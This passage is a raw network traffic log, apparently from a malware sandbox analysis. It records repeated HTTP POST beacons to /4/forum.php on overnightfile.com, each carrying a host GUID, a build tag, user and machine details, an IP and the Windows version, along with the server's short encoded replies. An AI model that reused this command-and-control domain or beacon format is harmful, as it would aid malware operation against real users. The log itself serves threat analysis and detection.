                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:03.894206047 CEST793INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZAZAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:04.232069969 CEST794OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:04.330991983 CEST794INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 42 59 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cABYZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:04.655843973 CEST794OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:04.758372068 CEST795INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNZAMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:05.177768946 CEST795OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:05.267096996 CEST796INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 46 55 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGFUTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:05.559700012 CEST796OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:05.653503895 CEST796INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGAZTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:05.965733051 CEST797OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:06.053298950 CEST797INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCZAXARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:06.352188110 CEST798OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:06.443144083 CEST798INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMGTNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:06.757255077 CEST799OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:06.845221043 CEST799INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 59 42 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYYBBARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:07.170154095 CEST800OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:07.261219978 CEST800INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZJQAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:07.583682060 CEST800OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:07.677033901 CEST801INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:07 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNGTMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:08.011208057 CEST801OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:08.099565983 CEST801INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:07 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMBYNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:08.460201025 CEST802OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:08.553215027 CEST802INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQZAJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:08.942475080 CEST802OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:09.033268929 CEST803INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZGTAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:09.489628077 CEST803OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:09.580629110 CEST803INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 51 4a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFQJUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:09.875055075 CEST804OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:09.963622093 CEST804INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:10.329473019 CEST805OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:10.419209003 CEST805INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 54 47 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTTGGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:10.738768101 CEST805OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:10.827363968 CEST806INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJKPQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:11.152817965 CEST806OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:11.241822004 CEST806INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
